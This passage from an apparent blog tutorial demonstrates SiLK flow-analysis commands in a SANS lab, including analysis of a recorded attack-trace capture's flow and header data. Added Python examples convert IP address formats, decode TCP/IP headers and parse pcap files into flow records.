<span style="color: white;"> 879563851| 2887523844|</span>
<span style="color: white;"> 879560724| 2887523844|</span>
<span style="color: white;"> 879560724| 2887523844|</span>
<span style="color: white;"> 879563851| 2887523844|</span>
<span style="color: white;"> 879870852| 2887523844|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Convert the decimal values back to dotted notation via <b><i>num2dot </i></b><i>--ip-field</i>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/02/09T16 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--type=all --pass-destination=stdout --protocol=6 | \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>rwcut --fields=sip,dip --num-recs=5 --ip-format=decimal | num2dot --ip-field=1,2</b></span>
<span style="color: white;"> sIP| dIP|</span>
<span style="color: white;"> 52.109.20.75| 172.28.30.4|</span>
<span style="color: white;"> 52.109.8.20| 172.28.30.4|</span>
<span style="color: white;"> 52.109.8.20| 172.28.30.4|</span>
<span style="color: white;"> 52.109.20.75| 172.28.30.4|</span>
<span style="color: white;"> 52.113.195.132| 172.28.30.4|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Show the IP addresses as hexadecimal via <i><b>rwcut </b>--ip-format=hexadecimal</i>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/02/09T16 --type=all \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--pass-destination=stdout --protocol=6 | rwcut --fields=sip,dip --num-recs=5 \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--ip-format=hexadecimal</b></span>
<span style="color: white;"> sIP| dIP|</span>
<span style="color: white;"> 346d144b| ac1c1e04|</span>
<span style="color: white;"> 346d0814| ac1c1e04|</span>
<span style="color: white;"> 346d0814| ac1c1e04|</span>
<span style="color: white;"> 346d144b| ac1c1e04|</span>
<span style="color: white;"> 3471c384| ac1c1e04|</span>
</pre></td></tr></tbody></table></div>
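<div>Added Python example, not from this post or from SiLK: the conversions behind <i>--ip-format=decimal</i>, <i>--ip-format=hexadecimal</i> and <i>num2dot --ip-field</i>, applied to the rows shown in the three listings above (the decimal rows are embedded as constructed input).</div>

```python
"""Convert rwcut IP columns between dotted, decimal and hexadecimal.

Added example, not part of the original post or the SiLK distribution.
It reimplements, for pipe-delimited rwcut text, what --ip-format=decimal,
--ip-format=hexadecimal and num2dot --ip-field do in the transcripts above.
"""
import ipaddress
import re
from typing import Iterable, List

NUMERIC = re.compile(r"[0-9a-fA-F]+")   # a bare decimal or hex token


def ipv4_to_int(dotted: str) -> int:
    """'52.109.20.75' -> 879563851 (rwcut --ip-format=decimal)."""
    return int(ipaddress.IPv4Address(dotted))


def ipv4_to_hex(dotted: str) -> str:
    """'52.109.20.75' -> '346d144b' (rwcut --ip-format=hexadecimal)."""
    return f"{ipv4_to_int(dotted):08x}"


def int_to_ipv4(value: int) -> str:
    """879563851 -> '52.109.20.75'; rejects values outside 32 bits."""
    if not 0 <= value <= 0xFFFFFFFF:
        raise ValueError(f"{value} is not a 32-bit address")
    return str(ipaddress.IPv4Address(value))


def num2dot_line(line: str, ip_fields: Iterable[int], base: int = 10,
                 delimiter: str = "|") -> str:
    """num2dot-style conversion of one delimited rwcut line.

    ip_fields are 1-based column numbers, as in num2dot --ip-field=1,2.
    base=10 handles rwcut's decimal output, base=16 its hexadecimal
    output (no 0x prefix). Tokens that are not bare numbers, such as the
    sIP/dIP header, pass through untouched; converted values are
    right-justified so the columns stay aligned."""
    cols = line.rstrip("\n").split(delimiter)
    for idx in ip_fields:
        if idx < 1 or idx > len(cols):
            raise IndexError(f"no field {idx} in {line!r}")
        tok = cols[idx - 1].strip()
        if tok and NUMERIC.fullmatch(tok):
            dotted = int_to_ipv4(int(tok, base))
            cols[idx - 1] = dotted.rjust(len(cols[idx - 1]))
    return delimiter.join(cols)


def num2dot(lines: Iterable[str], ip_fields: Iterable[int],
            base: int = 10) -> List[str]:
    """Apply num2dot_line to a whole rwcut output, returning the rows."""
    fields = tuple(ip_fields)
    return [num2dot_line(ln, fields, base) for ln in lines]


# Constructed input: the rwcut --ip-format=decimal rows shown above.
DECIMAL_ROWS = [
    "          sIP|        dIP|",
    "    879563851| 2887523844|",
    "    879560724| 2887523844|",
    "    879870852| 2887523844|",
]

if __name__ == "__main__":
    print("\n".join(num2dot(DECIMAL_ROWS, (1, 2))))
```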
</div><div><br /></div><div>Leveraging <b><i>rwaddrcount </i></b>to get information about the records in the file.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwaddrcount attack-trace.rw --print-recs</span></b></span>
<span style="color: white;"> sIP| Bytes| Packets| Records| Start_Time| End_Time|</span>
<span style="color: white;"> 192.150.11.111| 7297| 153| 6| 2019/04/20T03:28:28| 2019/04/20T03:28:44|</span>
<span style="color: white;"> 98.114.205.102| 171264| 195| 6| 2019/04/20T03:28:28| 2019/04/20T03:28:44|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Get some additional file statistics via <b><i>rwaddrcount.</i></b></div><div><b><i><br /></i></b></div><div><b><i><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwaddrcount attack-trace.rw --print-stat</span></b></span>
<span style="color: white;"> | sIP_Uniq| Bytes| Packets| Records|</span>
<span style="color: white;"> Total| 2| 178561| 348| 12|</span>
</pre></td></tr></tbody></table></div>
</i></b></div><div><b><i><br /></i></b></div><div>What are the 2 actual unique source IP values in that file? Continuing with <b><i>rwaddrcount</i></b>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwaddrcount attack-trace.rw --print-ips</span></b></span>
<span style="color: white;"> sIP</span>
<span style="color: white;"> 192.150.11.111</span>
<span style="color: white;"> 98.114.205.102</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Leveraging <b><i>rwappend</i></b> to create a new flow file from 2 existing flow files.</div><div><br /></div><div><div>Use <b><i>rwfilter </i></b>to create a file consisting of TCP flows.</div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/02/09T16 --max-pass=2 --type=all \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--pass-destination=tcp_file.rw --protocol=6</b></span>
</pre></td></tr></tbody></table></div>
</div><div>Use <b><i>rwfilter </i></b>to create a file consisting of UDP flows.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/02/09T16 </span></b></span><b><span style="color: #fcff01;">--max-pass=2 </span></b><b><span style="color: #fcff01;">--type=all \</span></b></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--pass-destination=udp_file.rw --protocol=17</b></span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Combine the TCP and UDP flow files created by <b><i>rwfilter </i></b>using <b><i>rwappend</i></b>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwappend --create tcp_udp.rw tcp_file.rw udp_file.rw</span></b></span><b><span style="color: #fcff01;">
</span></b></pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Use <b><i>rwcut </i></b>to see the contents of the <b><i>rwappend</i></b> merged files.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcut tcp_udp.rw --num-recs=5</span></b></span>
<span style="color: white;"> sIP| dIP|sPort|dPort|pro| packets| bytes| flags| sTime| duration| eTime| sensor|</span>
<span style="color: white;"> 52.109.20.75| 172.28.30.4| 443|50137| 6| 9| 8048| S PA |2022/02/09T16:01:29.214| 1.191|2022/02/09T16:01:30.405| Internal|</span>
<span style="color: white;"> 52.109.8.20| 172.28.30.4| 443|50138| 6| 7| 6533| S PA |2022/02/09T16:01:29.892| 0.513|2022/02/09T16:01:30.405| Internal|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137| 53|55874| 17| 1| 289| |2022/02/09T16:00:19.850| 0.002|2022/02/09T16:00:19.852| Internal|</span>
<span style="color: white;"> 17.253.26.125| 172.28.10.137| 123| 123| 17| 1| 76| |2022/02/09T16:00:35.377| 0.034|2022/02/09T16:00:35.411| Internal|</span>
</pre></td></tr></tbody></table></div></div><div><br /></div><div>Deduplicating two files into one via <b><i>rwdedupe</i></b>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwdedupe --buffer-size=88000 8.rw attack-trace.rw \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--output=deduped-data.rw</b></span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Use <b><i>rwfilter</i></b> <i>--ip-version </i>to track IPv6 addresses.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05 --end=2022/07/01T23 --ip-version=6 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><b><span style="color: #fcff01;"><span>--type=all --max-pass=5 --pass-desti</span><span>nation=stdout | rwcut --fields=sip,dip,dport</span></span></b>
<span style="color: white;"> sIP| dIP|dPort|</span>
<span style="color: white;"> fe80::250:56ff:fead:e8b6| ff02::2| 0|</span>
<span style="color: white;"> fe80::250:56ff:fead:445| ff02::2| 0|</span>
<span style="color: white;"> fe80::250:56ff:fead:e8b6| ff02::2| 0|</span>
<span style="color: white;"> fe80::250:56ff:fead:445| ff02::2| 0|</span>
<span style="color: white;"> fe80::250:56ff:fead:e8b6| ff02::2| 0|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Leveraging <b><i>rwpcut </i></b>to convert .pcap files to ASCII.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwpcut attack-trace.pcap 2>/dev/null | more</span></b></span>
<span style="color: white;">{'version': False, 'columns': False, 'delimiter': '|', 'epoch_time': False, 'fields': ['time</span>
<span style="color: white;">', 'sip', 'dip', 'sport', 'dport', 'proto', 'payhex'], 'integer_ips': False, 'zero_pad_ips':</span>
<span style="color: white;"> False, 'files': ['attack-trace.pcap']}</span>
<span style="color: white;">reading from file attack-trace.pcap, link-type EN10MB (Ethernet), snapshot length 65535</span>
<span style="color: white;">time|sip|dip|sport|dport|proto|payhex|</span>
<span style="color: white;">2019-04-20 03:28:28.374595|98.114.205.102|192.150.11.111|1821|445|6|450000303b9f40007106d24a</span>
<span style="color: white;">6272cd66c0960b6f071d01bd08cb8066000000007002faf0fa440000020405b401010402|</span>
<span style="color: white;">2019-04-20 03:28:28.375059|192.150.11.111|98.114.205.102|445|1821|6|450000300000400040063eea</span>
<span style="color: white;">c0960b6f6272cd6601bd071d5c3ba87408cb8067701216d0d9a40000020405b401010402|</span>
<span style="color: white;">2019-04-20 03:28:28.493653|98.114.205.102|192.150.11.111|1821|445|6|450000283bad40007106d244</span>
<span style="color: white;">6272cd66c0960b6f071d01bd08cb80675c3ba8755010faf022480000000000000000|</span>
<span style="color: white;">2019-04-20 03:28:28.508770|98.114.205.102|192.150.11.111|1821|445|6|450000283bae40007106d243</span>
<span style="color: white;">6272cd66c0960b6f071d01bd08cb80675c3ba8755011faf022470000000000000000|</span>
<span style="color: white;">...</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Ooops, that looks nasty. Making it cleaner by leveraging <i>--fields</i>, <i>--columnar</i>, <i>--delimiter</i> and <i>--zero-pad-ips</i>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwpcut attack-trace.pcap --fields=sip,sport,dip,dport --columnar --delimiter=" | " \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--zero-pad-ips 2>/dev/null| more</span></b></span>
<span style="color: white;">{'version': False, 'columns': True, 'delimiter': ' | ', 'epoch_time': False, 'fields': ['</span>
<span style="color: white;">sip', 'sport', 'dip', 'dport'], 'integer_ips': False, 'zero_pad_ips': True, 'files': ['attac</span>
<span style="color: white;">k-trace.pcap']}</span>
<span style="color: white;">reading from file attack-trace.pcap, link-type EN10MB (Ethernet), snapshot length 65535</span>
<span style="color: white;"> sip | sport | dip | dport |</span>
<span style="color: white;">098.114.205.102 | 1821 | 192.150.011.111 | 445 |</span>
<span style="color: white;">192.150.011.111 | 445 | 098.114.205.102 | 1821 |</span>
<span style="color: white;">098.114.205.102 | 1821 | 192.150.011.111 | 445 |</span>
<span style="color: white;">098.114.205.102 | 1821 | 192.150.011.111 | 445 |</span>
<span style="color: white;">098.114.205.102 | 1828 | 192.150.011.111 | 445 |</span>
<span style="color: white;">192.150.011.111 | 445 | 098.114.205.102 | 1828 |</span>
<span style="color: white;">192.150.011.111 | 445 | 098.114.205.102 | 1821 |</span>
<span style="color: white;">...</span>
</pre></td></tr></tbody></table></div>
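<div>The <i>payhex</i> column in the first <b><i>rwpcut</i></b> listing is the raw IP datagram, so it can be decoded. Added Python example (not from this post or from SiLK): a parser for that hex that pulls out the IPv4 and TCP header fields, run over the SYN and SYN/ACK of the port 445 session above, with the two line-wrapped hex strings from the listing joined and embedded as input.</div>

```python
"""Decode the payhex column of rwpcut into IPv4 and TCP header fields.

Added example, not part of the original post or the SiLK distribution.
The first two packets of the rwpcut listing above (the SYN and SYN/ACK
of the port-445 session) are embedded below, joined from the wrapped
lines; the hex is the IP datagram, so its header is what gets parsed.
"""
import struct
from dataclasses import dataclass, field
from ipaddress import IPv4Address
from typing import Dict, List, Optional

TCP_FLAG_NAMES = ("FIN", "SYN", "RST", "PSH", "ACK", "URG", "ECE", "CWR")


@dataclass
class Packet:
    src: str
    dst: str
    proto: int
    ttl: int
    total_len: int
    dont_fragment: bool
    sport: Optional[int] = None
    dport: Optional[int] = None
    seq: Optional[int] = None
    ack: Optional[int] = None
    flags: int = 0
    window: Optional[int] = None
    options: Dict[str, object] = field(default_factory=dict)

    def flag_names(self) -> List[str]:
        return [n for i, n in enumerate(TCP_FLAG_NAMES) if self.flags & (1 << i)]


def parse_tcp_options(raw: bytes) -> Dict[str, object]:
    """Walk TCP options as (kind, length, data); EOL and NOP are 1 byte."""
    opts: Dict[str, object] = {}
    i = 0
    while i < len(raw):
        kind = raw[i]
        if kind == 0:                    # end of option list
            break
        if kind == 1:                    # NOP padding
            i += 1
            continue
        if i + 1 >= len(raw):
            raise ValueError("truncated TCP option")
        length = raw[i + 1]
        if length < 2 or i + length > len(raw):
            raise ValueError("bad TCP option length")
        data = raw[i + 2:i + length]
        if kind == 2:
            opts["mss"] = struct.unpack("!H", data)[0]
        elif kind == 4:
            opts["sack_permitted"] = True
        else:
            opts[f"kind{kind}"] = data.hex()
        i += length
    return opts


def parse_payhex(payhex: str) -> Packet:
    """Parse an rwpcut payhex string (IPv4 datagram) into a Packet."""
    raw = bytes.fromhex(payhex.strip())
    if len(raw) < 20:
        raise ValueError("shorter than an IPv4 header")
    (ver_ihl, _tos, total_len, _ident, frag, ttl, proto,
     _csum, src, dst) = struct.unpack("!BBHHHBBH4s4s", raw[:20])
    if ver_ihl >> 4 != 4:
        raise ValueError("not IPv4")
    ihl = (ver_ihl & 0x0F) * 4
    pkt = Packet(str(IPv4Address(src)), str(IPv4Address(dst)), proto, ttl,
                 total_len, bool(frag & 0x4000))
    if proto != 6 or len(raw) < ihl + 20:
        return pkt                       # not TCP, or TCP header missing
    (pkt.sport, pkt.dport, pkt.seq, pkt.ack, off_flags, pkt.window,
     _tcsum, _urg) = struct.unpack("!HHIIHHHH", raw[ihl:ihl + 20])
    pkt.flags = off_flags & 0x01FF       # 9 flag bits incl. NS
    data_off = (off_flags >> 12) * 4
    pkt.options = parse_tcp_options(raw[ihl + 20:ihl + data_off])
    return pkt


# Constructed from the first two rwpcut records above (line wraps joined).
SYN_HEX = ("450000303b9f40007106d24a6272cd66c0960b6f071d01bd08cb8066"
           "000000007002faf0fa440000020405b401010402")
SYNACK_HEX = ("450000300000400040063eeac0960b6f6272cd6601bd071d5c3ba874"
              "08cb8067701216d0d9a40000020405b401010402")

if __name__ == "__main__":
    for h in (SYN_HEX, SYNACK_HEX):
        p = parse_payhex(h)
        print(p.src, p.sport, "->", p.dst, p.dport, p.flag_names(), p.options)
```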
</div><div><br /></div><div>Converting a pcap to SiLK flow records via <i style="font-weight: bold;">rwptoflow</i>, then piping the output to <b><i>rwcut</i></b>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwptoflow attack-trace.pcap | rwcut --num-recs=5 --fields=sip,dip,flags</span></b></span>
<span style="color: white;"> sIP| dIP| flags|</span>
<span style="color: white;"> 98.114.205.102| 192.150.11.111| S |</span>
<span style="color: white;"> 192.150.11.111| 98.114.205.102| S A |</span>
<span style="color: white;"> 98.114.205.102| 192.150.11.111| A |</span>
<span style="color: white;"> 98.114.205.102| 192.150.11.111|F A |</span>
<span style="color: white;"> 98.114.205.102| 192.150.11.111| S |</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Write the <b><i>rwptoflow </i></b>converted flow data to a file via <i>--flow-output</i>. At the same time, write the packets that were used to create the flows to another pcap file via <i>--packet-pass-output</i>. Print the statistics when everything is done, and add an annotation to the flow file via <i>--note-add</i>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwptoflow attack-trace.pcap --flow-output rwp_flow_file.rw \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--note-add "Converted from attacktrace.pcap" --compression-method=zlib \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--packet-pass-output=rwp.pcap --print-statistics --set-sensorid=1</span></b></span>
<span style="color: white;">Packet count statistics for attack-trace.pcap</span>
<span style="color: white;"> 348 read</span>
<span style="color: white;"> 0 rejected: too short to get information</span>
<span style="color: white;"> 0 rejected: not IPv4</span>
<span style="color: white;"> 348 total written</span>
<span style="color: white;"> 0 total fragmented packets</span>
<span style="color: white;"> 0 zero-packet of a fragment</span>
<span style="color: white;"> 0 incomplete (no ports and/or flags)</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Validate the <i>rwp.pcap</i> file.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">file rwp.pcap</span></b></span>
<span style="color: white;">rwp.pcap: pcap capture file, microsecond ts (little-endian) - version 2.4 (Ethernet, capture length 65535)</span>
</pre></td></tr></tbody></table></div>
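<div><br /></div><div>To see what <b><i>rwptoflow</i></b> is doing underneath, here is an added example in Python (not code from this post or from SiLK). It decodes the pcap global header the way <i>file</i> described <i>rwp.pcap</i> above (magic, byte order, timestamp unit, version 2.4, snaplen 65535), then walks the packet records and writes one flow record per IPv4 packet while keeping the same counters that <i>--print-statistics</i> reports. The pcap is constructed in memory from documentation-range addresses, so nothing here is the content of <i>attack-trace.pcap</i>.</div>

```python
"""pcap reader that mirrors rwptoflow: one flow record per packet, with the same
accept/reject counters. Added example; not code from the blog post or from SiLK.
The pcap is constructed in memory so the block runs offline."""
import struct
from collections import Counter
from ipaddress import IPv4Address

PCAP_MAGIC_USEC = 0xA1B2C3D4      # microsecond timestamps, as `file` reported for rwp.pcap
PCAP_MAGIC_NSEC = 0xA1B23C4D
LINKTYPE_ETHERNET = 1
ETHERTYPE_IPV4 = 0x0800


def build_ipv4_frame(src, dst, proto, sport, dport, payload=b"", tcp_flags=0x18):
    """Constructed Ethernet/IPv4 frame with a TCP, UDP or bare (e.g. ICMP) payload."""
    eth = b"\x00" * 12 + struct.pack("!H", ETHERTYPE_IPV4)
    if proto == 6:     # 20-byte TCP header, PSH|ACK by default
        l4 = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, tcp_flags, 8192, 0, 0)
    elif proto == 17:  # 8-byte UDP header
        l4 = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0)
    else:
        l4 = b""
    l4 += payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4), 0, 0, 64, proto, 0,
                     IPv4Address(src).packed, IPv4Address(dst).packed)
    return eth + ip + l4


def build_pcap(frames, snaplen=65535):
    """Little-endian pcap 2.4 file image, the layout `file` described above."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC_USEC, 2, 4, 0, 0, snaplen, LINKTYPE_ETHERNET)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1_644_330_400 + i, 0, len(frame), len(frame)) + frame
    return out


def describe_pcap_header(data):
    """Decode the global header: byte order, timestamp unit, version, snaplen, link type."""
    magic = struct.unpack("<I", data[:4])[0]
    order = {PCAP_MAGIC_USEC: "<", PCAP_MAGIC_NSEC: "<", 0xD4C3B2A1: ">", 0x4D3CB2A1: ">"}.get(magic)
    if order is None:
        raise ValueError("not a pcap file")
    nanosec = magic in (PCAP_MAGIC_NSEC, 0x4D3CB2A1)
    major, minor, _tz, _sig, snaplen, linktype = struct.unpack(order + "HHiIII", data[4:24])
    return {"order": order, "byte_order": "little-endian" if order == "<" else "big-endian",
            "timestamp": "nanosecond" if nanosec else "microsecond",
            "version": f"{major}.{minor}", "snaplen": snaplen, "linktype": linktype}


def packets_to_flows(data):
    """Return (flows, stats): one flow per IPv4 packet plus rwptoflow-style counters."""
    order = describe_pcap_header(data)["order"]
    stats, flows, off = Counter(), [], 24
    while off + 16 <= len(data):
        ts_sec, _ts_frac, incl_len, _orig_len = struct.unpack(order + "IIII", data[off:off + 16])
        frame = data[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        stats["read"] += 1
        if len(frame) < 14 + 20:                      # no room for Ethernet + IPv4 headers
            stats["rejected: too short to get information"] += 1
            continue
        if struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
            stats["rejected: not IPv4"] += 1
            continue
        ip = frame[14:]
        ihl, proto = (ip[0] & 0x0F) * 4, ip[9]
        flags_frag = struct.unpack("!H", ip[6:8])[0]
        if flags_frag & 0x3FFF:                       # MF bit set or non-zero fragment offset
            stats["total fragmented packets"] += 1
            if flags_frag & 0x1FFF == 0:
                stats["zero-packet of a fragment"] += 1
        l4 = ip[ihl:]
        sport = dport = tcp_flags = 0
        if proto in (6, 17) and len(l4) >= 4:
            sport, dport = struct.unpack("!HH", l4[:4])
            if proto == 6 and len(l4) >= 14:
                tcp_flags = l4[13]
        else:  # counted but still written; rwptoflow drops these only with --reject-incomplete
            stats["incomplete (no ports and/or flags)"] += 1
        flows.append({"stime": ts_sec, "sip": str(IPv4Address(ip[12:16])),
                      "dip": str(IPv4Address(ip[16:20])), "proto": proto, "sport": sport,
                      "dport": dport, "flags": tcp_flags, "packets": 1,
                      "bytes": struct.unpack("!H", ip[2:4])[0]})
        stats["total written"] += 1
    return flows, stats


# Constructed sample: TCP to 445, a DNS reply, an ARP frame, a truncated frame, an ICMP echo.
SAMPLE_PCAP = build_pcap([
    build_ipv4_frame("192.0.2.10", "198.51.100.20", 6, 1821, 445),
    build_ipv4_frame("198.51.100.20", "192.0.2.10", 17, 53, 56213, b"A" * 100),
    b"\x00" * 12 + struct.pack("!H", 0x0806) + b"\x00" * 28,
    b"\x00" * 20,
    build_ipv4_frame("192.0.2.10", "198.51.100.20", 1, 0, 0, b"\x08\x00\x00\x00"),
])

if __name__ == "__main__":
    hdr = describe_pcap_header(SAMPLE_PCAP)
    print(f"pcap {hdr['version']} {hdr['byte_order']} {hdr['timestamp']} ts, snaplen {hdr['snaplen']}")
    flows, stats = packets_to_flows(SAMPLE_PCAP)
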